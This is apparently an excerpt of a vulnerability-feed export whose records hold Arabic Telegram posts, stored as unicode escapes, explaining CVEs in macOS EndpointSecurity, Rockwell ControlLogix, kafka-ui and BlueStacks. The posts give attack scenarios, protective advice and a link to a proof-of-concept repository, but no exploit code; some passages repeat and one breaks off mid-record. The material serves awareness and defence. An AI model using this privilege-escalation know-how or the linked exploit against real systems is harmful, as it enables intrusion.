\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u062f \u062d\u0635\u0644 \u0628\u0627\u0644\u0641\u0639\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n   - \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629: \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0623\u0639\u0644\u0649\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647 \u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n\n3. \u0623\u0645\u062b\u0644\u0629 \u0628\u0633\u064a\u0637\u0629:\n   - \u0645\u062b\u0627\u0644 1: \u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0647\u0646\u0627\u0643 \u0645\u0648\u0638\u0641\u064b\u0627 \u064a\u064f\u062f\u0639\u0649 \u0623\u062d\u0645\u062f \u064a\u0639\u0645\u0644 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 macOS. \u0623\u062d\u0645\u062f \u064a\u0641\u062a\u062d \u0645\u0631\u0641\u0642 \u0628\u0631\u064a\u062f \u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631. 
\u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u062d\u0643\u0645 \u0627\u0644\u0643\u0627\u0645\u0644 \u0641\u064a \u062c\u0647\u0627\u0632 \u0623\u062d\u0645\u062f.\n   - \u0645\u062b\u0627\u0644 2: \u0633\u0627\u0631\u0629 \u062a\u0642\u0648\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0645\u0646 \u0645\u0635\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642. \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805. \u0628\u0645\u062c\u0631\u062f \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u060c \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644.\n\n4. 
\u0643\u064a\u0641 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643:\n   - \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645: \u062a\u0623\u0643\u062f \u062f\u0627\u0626\u0645\u064b\u0627 \u0645\u0646 \u0623\u0646 \u0646\u0638\u0627\u0645 macOS \u0645\u062d\u062f\u062b \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631\u060c \u062d\u064a\u062b \u064a\u062a\u0645 \u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u062c\u062f\u064a\u062f\u0629.\n   - \u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c: \u0644\u0627 \u062a\u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0623\u0648 \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n   - \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629: \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632\u0643 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0627\u0639\u062f \u0641\u064a \u0627\u0643\u062a\u0634\u0627\u0641 \u0648\u0625\u064a\u0642\u0627\u0641 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\u0629.\n\n#### \u062e\u0644\u0627\u0635\u0629:\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity \u062a\u064f\u0638\u0647\u0631 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 
\u0627\u0644\u0646\u0638\u0627\u0645. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0648\u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n\nALSED404:\n\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u062e\u0637\u0648\u0631\u0629 (CVE-2024-6242) \u0641\u064a \u0623\u062c\u0647\u0632\u0629 Rockwell Automation ControlLogix 1756.\n\n\u0642\u062f \u064a\u0624\u062f\u064a \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0625\u0644\u0649 \u0625\u0635\u062f\u0627\u0631 \u0623\u0648\u0627\u0645\u0631 CIP \u063a\u064a\u0631 \u0645\u0635\u0631\u062d \u0628\u0647\u0627\u060c \u0645\u0645\u0627 \u064a\u0624\u062b\u0631 \u0639\u0644\u0649 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0627\u0644\u062c\u0647\u0627\u0632 \u0648\u0645\u0634\u0627\u0631\u064a\u0639 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645.\n\u0627\u0642\u0631\u0623: https://thehackernews.com/2024/08/critical-flaw-in-rockwell-automation.html\n\nThe Smart Shadow:\n\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u0642\u0631\u064a\u0631\n\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u0630\u064a \u0623\u0634\u0631\u062a \u0625\u0644\u064a\u0647 \u064a\u062a\u062d\u062f\u062b \u0639\u0646 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642 kafka-ui\u060c \u0648\u0647\u064a \u0648\u0627\u062c\u0647\u0629 \u0645\u0633\u062a\u062e\u062f\u0645 \u0644\u0625\u062f\u0627\u0631\u0629 Apache 
Kafka. \u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u064a\u0648\u0636\u062d \u0646\u0648\u0639\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a:\n\n1. GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS (Cross-Site Scripting)\n2. GHSL-2023-230: \u062b\u063a\u0631\u0629 \u0623\u062e\u0631\u0649 \u0644\u0645 \u064a\u062a\u0645 \u062a\u062d\u062f\u064a\u062f \u0646\u0648\u0639\u0647\u0627 \u0628\u0634\u0643\u0644 \u0648\u0627\u0636\u062d \u0641\u064a \u0627\u0644\u0639\u0646\u0648\u0627\u0646\n\n### GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS\n\u062b\u063a\u0631\u0629 XSS \u062a\u062d\u062f\u062b \u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u062d\u0642\u0646 \u0634\u064a\u0641\u0631\u0629 JavaScript \u0636\u0627\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 \u0648\u064a\u0628\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u0641\u064a \u0645\u062a\u0635\u0641\u062d \u0627\u0644\u0636\u062d\u064a\u0629.\n\n#### \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 (Vulnerable method):\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0644\u062f\u064a\u0646\u0627 \u0637\u0631\u064a\u0642\u0629 \u0641\u064a \u0627\u0644\u0643\u0648\u062f \u062a\u0639\u0631\u0636 \u0645\u062f\u062e\u0644\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 HTML \u062f\u0648\u0646 \u062a\u0646\u0642\u064a\u0629:", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</description>
      <content:encoded>{"uuid": "51ca8f8b-aeb4-43c0-b549-e8a1f5fad200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "https://t.me/cyber_hsecurity/1613", "content": "3. \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a:\n   - \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0645\u0646 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0625\u0644\u0649 \u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0636\u064a\u0641 (host operating system). \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631.\n\n\u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u060c \u064a\u062c\u0628 \u0627\u062a\u0628\u0627\u0639 \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. 
\u062a\u062d\u062f\u064a\u062b BlueStacks:\n   - \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0644\u0627\u0632\u0645\u0629. \u062a\u0642\u0648\u0645 \u0627\u0644\u0634\u0631\u0643\u0629 \u0627\u0644\u0645\u0637\u0648\u0631\u0629 \u0628\u0625\u0635\u062f\u0627\u0631 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u062f\u0648\u0631\u064a\u0629 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n\n2. \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a:\n   - \u0627\u0633\u062a\u062e\u062f\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0627\u0644\u0645\u062d\u062f\u062b\u0629 \u0644\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0636\u0627\u0631\u0629 \u0648\u0645\u0646\u0639\u0647\u0627 \u0645\u0646 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u062f\u0627\u062e\u0644 BlueStacks.\n\n3. \u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629:\n   - \u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0641\u0642\u0637 \u0645\u0646 \u0645\u062a\u0627\u062c\u0631 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0645\u0648\u062b\u0648\u0642\u0629 \u0645\u062b\u0644 Google Play. 
\u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0639\u0631\u0648\u0641\u0629 \u0623\u0648 \u0645\u0634\u0628\u0648\u0647\u0629.\n\n\u0627\u0644\u062e\u0644\u0627\u0635\u0629:\n\n\u062a\u0639\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062e\u0637\u064a\u0631\u064b\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u062a\u063a\u0644\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0623\u0646 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u0628\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u062a\u062e\u0630 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643\u060c \u0645\u062b\u0644 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0648\u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n\n\nhttps://github.com/mmiszczyk/CVE-2024-33352\n\nABO TURAB:\n### CVE-2019-8805: \u062a\u0635\u0639\u064a\u062f 
\u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity\n\n#### \u0645\u0642\u062f\u0645\u0629:\n\u0627\u0644\u0645\u0642\u0627\u0644\u0629 \u062a\u062a\u0646\u0627\u0648\u0644 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0634\u0631\u0643\u0629 Apple\u060c \u062a\u064f\u0639\u0631\u0641 \u0628\u0627\u0633\u0645 CVE-2019-8805. \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644 \u0627\u0644\u0646\u0638\u0627\u0645.\n\n#### \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629:\n\n1. 
\u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 (CVE-2019-8805):\n   - \u062a\u0639\u0631\u064a\u0641: CVE-2019-8805 \u0647\u064a \u062b\u063a\u0631\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0646\u0638\u0627\u0645 macOS\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a.\n   - \u0643\u064a\u0641 \u062a\u0639\u0645\u0644: \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u062a\u062c\u0627\u0648\u0632 \u0642\u064a\u0648\u062f \u0627\u0644\u0623\u0645\u0627\u0646 \u0648\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647\u0645 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0633\u0624\u0648\u0644.\n\n2. \u0643\u064a\u0641 \u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629:\n   - \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u062d\u0644\u064a: \u064a\u062c\u0628 \u0623\u0646 \u064a\u0643\u0648\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u0627\u062f\u0631\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. 
\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u062f \u062d\u0635\u0644 \u0628\u0627\u0644\u0641\u0639\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n   - \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629: \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0623\u0639\u0644\u0649\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647 \u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n\n3. \u0623\u0645\u062b\u0644\u0629 \u0628\u0633\u064a\u0637\u0629:\n   - \u0645\u062b\u0627\u0644 1: \u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0647\u0646\u0627\u0643 \u0645\u0648\u0638\u0641\u064b\u0627 \u064a\u064f\u062f\u0639\u0649 \u0623\u062d\u0645\u062f \u064a\u0639\u0645\u0644 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 macOS. \u0623\u062d\u0645\u062f \u064a\u0641\u062a\u062d \u0645\u0631\u0641\u0642 \u0628\u0631\u064a\u062f \u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631. 
\u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u062d\u0643\u0645 \u0627\u0644\u0643\u0627\u0645\u0644 \u0641\u064a \u062c\u0647\u0627\u0632 \u0623\u062d\u0645\u062f.\n   - \u0645\u062b\u0627\u0644 2: \u0633\u0627\u0631\u0629 \u062a\u0642\u0648\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0645\u0646 \u0645\u0635\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642. \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805. \u0628\u0645\u062c\u0631\u062f \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u060c \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644.\n\n4. 
\u0643\u064a\u0641 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643:\n   - \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645: \u062a\u0623\u0643\u062f \u062f\u0627\u0626\u0645\u064b\u0627 \u0645\u0646 \u0623\u0646 \u0646\u0638\u0627\u0645 macOS \u0645\u062d\u062f\u062b \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631\u060c \u062d\u064a\u062b \u064a\u062a\u0645 \u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u062c\u062f\u064a\u062f\u0629.\n   - \u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c: \u0644\u0627 \u062a\u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0623\u0648 \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n   - \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629: \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632\u0643 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0627\u0639\u062f \u0641\u064a \u0627\u0643\u062a\u0634\u0627\u0641 \u0648\u0625\u064a\u0642\u0627\u0641 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\u0629.\n\n#### \u062e\u0644\u0627\u0635\u0629:\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity \u062a\u064f\u0638\u0647\u0631 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 